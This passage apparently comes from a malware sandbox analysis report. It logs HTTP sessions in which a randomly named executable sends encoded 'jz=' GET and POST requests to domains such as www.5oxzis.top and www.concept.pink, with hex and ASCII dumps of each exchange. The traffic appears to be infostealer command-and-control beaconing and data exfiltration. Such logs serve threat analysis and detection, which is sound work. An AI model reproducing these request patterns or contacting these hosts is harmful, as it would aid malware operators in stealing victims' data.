                            Data Ascii: jz=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMLBtVl+kEV3St2j0sRoZ7jSnD2wRyvQAtIEimK7xMo4kPFNrPt5oDtMoI9wQKcHuLX+ARAT2khZTUlJOQZqQWwlUhQQl5WuaoqHClWhRioupdPhmM3kwzfKPoMweeEN0Nd3lqNdImmmOPLNUadlZlgPHLuHxTrMZIpcmFJ/d+tnEqUPQbmRe9A7PHyaIU/5Mx/GJjjC9g1W8KDGdOhZ+oNTwZpS7ZzI+xMavQldL8etGV/jv6XxgqoJ1QUVaZ+AXoTsgSJK2/wmtU4O2aOmjgbAhEc9zQoJshuPW4TLUXEwLUowJG3XzbcUzdRZwF9hoyIPu8DfG+k5o+BeF0y6NAennu+yeWb33M/TZRZd7Qr5ogLEQN7zQr/do97crqVYGcblXqiqBjdWggu/jFegVe3fscIkRaUC5rX6yrp4tpES5oAQs0JRgjtJuEvb57cR+MnPny70DpCRPglBynbivfpVoBQqbO0pKpN8wjNCX/NiO5X8WW1+t9P7ROAqWOztx8LNG+bHFa9R7FabsTzMzgImD1q6S+RFfZXnG9dH/LfuNf5Q/1/1nGditwbvDPY3U5cVXZW7VVC/Tfg8zHDITpooTnY8w93TYzh+gwZV4YQdnCWnTfxmQc9j5hjxHKvkYeDeVYaUxceGV6Ys/OMT2LbKYoTaywiU97G95JT9vjSYVWwiA8FSpQAo+QK94JdIAVr6htBAqpj6Beh3pF4GutHS9az0cvzXRVfI+d5uNrn8fcPmXVc0/yjDsh2/raVmdbsDVKlOKaOgR5DuVqX+lxq5L7DUm8Y0O5zyT7Ja6LIY1pKWIw7vFEMAOXUOX0/ZUVy0SbJPs6ZjIk/Oa+d20BMi1VQbSfrTUVOqs6CEzyW2Ydb3HLsT/uCdMx5W/Tqjo3PoMck1dno4Ib6itWkiiiD2iFedGmmeNMrpxlFTDcrFT3E+MQA+WuJMxVV6TXJNlMdngYbgG [TRUNCATED]
                            Sep 27, 2024 09:08:21.110012054 CEST1236INHTTP/1.1 200 OK
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Date: Fri, 27 Sep 2024 07:08:20 GMT
                            Server: Apache
                            Content-Encoding: gzip
                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                            Sep 27, 2024 09:08:21.110044003 CEST224INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+
                            Sep 27, 2024 09:08:21.110070944 CEST675INData Raw: 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38 9e 57 d4 65 ea e6 83 44 97 97 bb 06
                            Data Ascii: EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK|i(eOx.hp8<


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.549716217.160.0.27803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:22.961647987 CEST402OUTGET /4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX HTTP/1.1
                            Host: www.concept.pink
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Sep 27, 2024 09:08:23.600423098 CEST1236INHTTP/1.1 200 OK
                            Content-Type: text/html
                            Content-Length: 4545
                            Connection: close
                            Date: Fri, 27 Sep 2024 07:08:23 GMT
                            Server: Apache
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                            Sep 27, 2024 09:08:23.600482941 CEST1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                            Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                            Sep 27, 2024 09:08:23.600519896 CEST448INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                            Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                            Sep 27, 2024 09:08:23.600550890 CEST1236INData Raw: 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b
                            Data Ascii: olor:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-weight: bold;">English</s
                            Sep 27, 2024 09:08:23.600586891 CEST527INData Raw: 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34
                            Data Ascii: .</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web &egrave; appena stato attivato. Ancora non c&#39;&egrave; contenuto.</div> </div>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.54971720.2.217.253803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:31.226924896 CEST648OUTPOST /6tyq/ HTTP/1.1
                            Host: www.5oxzis.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.5oxzis.top
                            Referer: http://www.5oxzis.top/6tyq/
                            Connection: close
                            Content-Length: 203
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 36 41 2b 4d 35 37 63 4f 4f 73 79 55 61 2b 62 56 50 2f 64 41 51 30 36 30 62 62 6b 44 57 41 4e 52 6d 68 64 45 4f 63 74 34 59 53 5a 7a 44 34 50 70 61 61 54 51 50 47 77 57 71 4a 79 63 69 35 61 76 71 4e 50 55 32 72 72 6e 31 2b 77 48 58 56 49 47 36 7a 50 61 64 47 4c 75 72 66 4c 48 6b 67 4e 36 48 55 65 59 49 6e 6e 67 6d 61 47 72 33 41 6e 4d 6b 70 4c 4c 53 6d 7a 52 46 69 4e 32 31 67 72 67 6e 45 53 37 4f 64 4f 34 5a 74 62 51 56 61 44 76 46 4e 74 39 44 66 72 4e 55 58 63 4e 48 68 6c 47 59 59 36 50 4b 6b 54 63 4e 6f 6d 44 53 76 4f 61 55 61 39 49 74 54 4e 41 33 73 3d
                            Data Ascii: jz=ulKXxSxQ6Qf5q6A+M57cOOsyUa+bVP/dAQ060bbkDWANRmhdEOct4YSZzD4PpaaTQPGwWqJyci5avqNPU2rrn1+wHXVIG6zPadGLurfLHkgN6HUeYInngmaGr3AnMkpLLSmzRFiN21grgnES7OdO4ZtbQVaDvFNt9DfrNUXcNHhlGYY6PKkTcNomDSvOaUa9ItTNA3s=
                            Sep 27, 2024 09:08:32.105614901 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:31 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.54971820.2.217.253803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:33.772583961 CEST668OUTPOST /6tyq/ HTTP/1.1
                            Host: www.5oxzis.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.5oxzis.top
                            Referer: http://www.5oxzis.top/6tyq/
                            Connection: close
                            Content-Length: 223
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 65 38 2b 66 61 6a 63 66 2b 73 78 52 61 2b 62 61 76 2f 52 41 51 34 36 30 61 66 53 57 77 34 4e 55 33 39 64 46 4c 67 74 35 59 53 5a 6e 7a 34 4f 6d 36 61 49 51 50 4b 4f 57 72 31 79 63 69 64 61 76 6f 6c 50 55 6c 7a 71 6c 6c 2b 79 4b 33 56 4f 4d 61 7a 50 61 64 47 4c 75 72 4b 67 48 6b 6f 4e 36 30 63 65 61 70 6e 6d 37 47 61 46 39 48 41 6e 61 55 6f 6a 4c 53 6d 42 52 45 4f 7a 32 7a 6b 72 67 6c 63 53 38 66 64 42 74 4a 74 5a 50 6c 62 32 6c 6e 70 6b 31 31 48 58 41 58 32 6f 56 31 6c 2b 48 75 31 51 56 6f 73 37 50 74 45 65 54 42 6e 35 4c 6b 37 55 53 4f 44 39 65 67 34 52 61 6b 70 6d 64 55 4e 38 6f 5a 64 68 75 6f 38 39 53 67 79 55
                            Data Ascii: jz=ulKXxSxQ6Qf5qe8+fajcf+sxRa+bav/RAQ460afSWw4NU39dFLgt5YSZnz4Om6aIQPKOWr1ycidavolPUlzqll+yK3VOMazPadGLurKgHkoN60ceapnm7GaF9HAnaUojLSmBREOz2zkrglcS8fdBtJtZPlb2lnpk11HXAX2oV1l+Hu1QVos7PtEeTBn5Lk7USOD9eg4RakpmdUN8oZdhuo89SgyU
                            Sep 27, 2024 09:08:34.633534908 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:34 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.54971920.2.217.253803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:36.320971012 CEST1685OUTPOST /6tyq/ HTTP/1.1
                            Host: www.5oxzis.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.5oxzis.top
                            Referer: http://www.5oxzis.top/6tyq/
                            Connection: close
                            Content-Length: 1239
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 75 6c 4b 58 78 53 78 51 36 51 66 35 71 65 38 2b 66 61 6a 63 66 2b 73 78 52 61 2b 62 61 76 2f 52 41 51 34 36 30 61 66 53 57 77 77 4e 49 56 31 64 46 6f 49 74 36 59 53 5a 6b 7a 34 4c 6d 36 62 4b 51 50 53 53 57 72 34 46 63 6b 5a 61 75 4c 64 50 42 6b 7a 71 2f 31 2b 79 57 48 56 50 47 36 7a 65 61 63 32 50 75 72 61 67 48 6b 6f 4e 36 31 4d 65 65 34 6e 6d 35 47 61 47 72 33 41 72 4d 6b 70 4f 4c 53 65 37 52 45 4c 49 32 6a 45 72 67 46 4d 53 2b 74 46 42 73 70 74 66 4d 6c 62 75 6c 6e 55 38 31 78 75 37 41 57 43 47 56 33 31 2b 47 36 63 72 46 62 78 69 4e 4d 6f 68 65 41 47 66 53 54 72 71 50 4e 2f 70 65 53 74 79 62 57 6b 4e 65 7a 4e 77 6b 34 30 62 30 39 41 4f 44 57 44 66 39 4d 76 64 73 48 68 54 73 51 52 48 6d 76 58 38 4c 55 46 45 39 2b 43 59 71 4d 4c 78 43 5a 79 50 6b 4a 5a 51 55 77 57 52 36 34 61 4e 4e 2b 6f 42 6a 4d 43 79 6b 63 49 6d 57 38 57 71 44 44 41 76 66 6f 45 79 33 6c 65 4a 72 65 69 76 65 71 69 70 61 61 2f 6b 50 49 41 7a 69 75 61 30 7a 4a 7a 55 37 68 54 37 76 4c 44 7a 4a 59 69 4d 32 34 53 56 46 38 2b [TRUNCATED]
                            Data Ascii: jz=ulKXxSxQ6Qf5qe8+fajcf+sxRa+bav/RAQ460afSWwwNIV1dFoIt6YSZkz4Lm6bKQPSSWr4FckZauLdPBkzq/1+yWHVPG6zeac2PuragHkoN61Mee4nm5GaGr3ArMkpOLSe7RELI2jErgFMS+tFBsptfMlbulnU81xu7AWCGV31+G6crFbxiNMoheAGfSTrqPN/peStybWkNezNwk40b09AODWDf9MvdsHhTsQRHmvX8LUFE9+CYqMLxCZyPkJZQUwWR64aNN+oBjMCykcImW8WqDDAvfoEy3leJreiveqipaa/kPIAziua0zJzU7hT7vLDzJYiM24SVF8+QzMkTEfGZwEDC3P5y+dzCHMcbpYfgG/JawJw2Q6wixXlR9/im+q6fVcc9Hc4feZ5ei9LJ0ytNQjTjS7kgOe2a+LUEfrnYhoSrFUQw81wa2qiyyAlaksI/M4v25ldRyQXEeEInqN7AREipOwkRGNSKun+4HukyawsIr7+sd1aoe64pr6C96cyjI+J0vT5tg0dHznYPVEAjRqTQIALm3p3ASI2iR97S8CyuYDUvpUGk+a+lqHHQyK8t0FnGBS5d/JyUAb5wsAVbYaQtY1YbbIbE3ltp0x9OWWBQfJvtgfNwBNEg1Lgu+tlK270NBx8yJ1bwn3R6au/Z9AWO2y3OJj6A8MFID0thUrCViJFXEVcBBZbnMolR8ZP4qwDHrvc+rAPb3GCTytTCCh93NznGHKoUIHhLvVPFAD/YzGkv8RFoBaUfd8zLJ5+OEtG/6ZYFWFGe1P72EmOq2DP10o9ysVOx/e8ovIVnomM0QLj7YXWVk0mrBztXbOY9gCd+yhH6W1ep9Zlev5IgJsPVz3HxL1/Ll8OeoBe8MXvpgA5e1bvSm3sQgAPCcdUnjZjDNSiJ55DB2P4KdYbqIFzJDHSnHoLD+xmlwimA6xoB7brra7q+hyL4UseyXktBkfVvehBjj4YiagjOBBBZBTFxR1ApU9WqfuIhkPfa6JPpg [TRUNCATED]
                            Sep 27, 2024 09:08:37.182132959 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 27 Sep 2024 07:08:37 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.54972020.2.217.253803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:38.863893986 CEST400OUTGET /6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX HTTP/1.1
                            Host: www.5oxzis.top
                            Accept: */*
